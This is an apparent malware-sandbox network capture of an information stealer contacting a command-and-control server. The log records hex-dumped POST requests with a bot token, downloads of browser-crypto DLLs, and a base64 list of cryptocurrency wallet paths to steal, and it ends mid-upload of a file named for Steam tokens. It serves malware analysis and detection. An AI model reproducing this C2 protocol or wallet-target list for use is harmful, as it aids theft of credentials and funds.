Jul 2, 2024 07:31:02.423820019 CEST	896	IN	Data Raw: 00 80 8b 45 dc 85 f6 89 08 89 58 04 b8 02 00 00 00 75 0c 83 7d e8 00 b8 03 00 00 00 0f 45 c2 83 c4 34 5b 5e 5f 5d c3 55 31 c9 89 e5 57 56 53 83 ec 0c 89 45 e8 89 55 ec 31 c0 31 d2 8b 5d e8 8a 1c 0b 0f b6 fb f6 87 e0 a1 ec 61 04 74 3a be 0a 00 00 Data Ascii: EXu}E4[^_]U1WVSEU11]at:krwvE1AutM[^_]UWVSxZlHxBLpu
Jul 2, 2024 07:31:04.076822996 CEST	199	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAA Host: 40.86.87.10 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 07:31:04.482224941 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:04.572771072 CEST	199	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECF Host: 40.86.87.10 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 07:31:05.368815899 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:05.369287968 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:05.463787079 CEST	557	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJ Host: 40.86.87.10 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a [TRUNCATED] Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="file"------IJJJEBFHDBGIECBFCBKJ--
Jul 2, 2024 07:31:05.855406046 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:06.208904028 CEST	557	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK Host: 40.86.87.10 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 [TRUNCATED] Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="file"------GDGDHJJDGHCAAAKEHIJK--
Jul 2, 2024 07:31:06.603471994 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:06.805681944 CEST	90	OUT	GET /b13597c85f807692/freebl3.dll HTTP/1.1 Host: 40.86.87.10 Cache-Control: no-cache
Jul 2, 2024 07:31:07.200892925 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:07 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Jul 2, 2024 07:31:08.221621037 CEST	90	OUT	GET /b13597c85f807692/mozglue.dll HTTP/1.1 Host: 40.86.87.10 Cache-Control: no-cache
Jul 2, 2024 07:31:08.607769966 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:08 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Jul 2, 2024 07:31:09.909750938 CEST	91	OUT	GET /b13597c85f807692/msvcp140.dll HTTP/1.1 Host: 40.86.87.10 Cache-Control: no-cache
Jul 2, 2024 07:31:10.298284054 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:10 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Jul 2, 2024 07:31:11.086766958 CEST	87	OUT	GET /b13597c85f807692/nss3.dll HTTP/1.1 Host: 40.86.87.10 Cache-Control: no-cache
Jul 2, 2024 07:31:11.482508898 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:11 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Jul 2, 2024 07:31:13.642745972 CEST	91	OUT	GET /b13597c85f807692/softokn3.dll HTTP/1.1 Host: 40.86.87.10 Cache-Control: no-cache
Jul 2, 2024 07:31:14.061768055 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:13 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Jul 2, 2024 07:31:14.549447060 CEST	95	OUT	GET /b13597c85f807692/vcruntime140.dll HTTP/1.1 Host: 40.86.87.10 Cache-Control: no-cache
Jul 2, 2024 07:31:14.934967041 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:14 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Jul 2, 2024 07:31:15.638582945 CEST	199	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF Host: 40.86.87.10 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 07:31:16.042133093 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:16.093272924 CEST	465	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIE Host: 40.86.87.10 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 2d 2d 0d 0a Data Ascii: ------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="message"wallets------DGCBKECAKFBGCAKECGIE--
Jul 2, 2024 07:31:16.479234934 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
Jul 2, 2024 07:31:16.482513905 CEST	463	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGH Host: 40.86.87.10 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"files------JEGHJDGIJECGDHJJECGH--
Jul 2, 2024 07:31:16.867860079 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 02 Jul 2024 05:31:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jul 2, 2024 07:31:16.934720039 CEST	561	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBK Host: 40.86.87.10 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 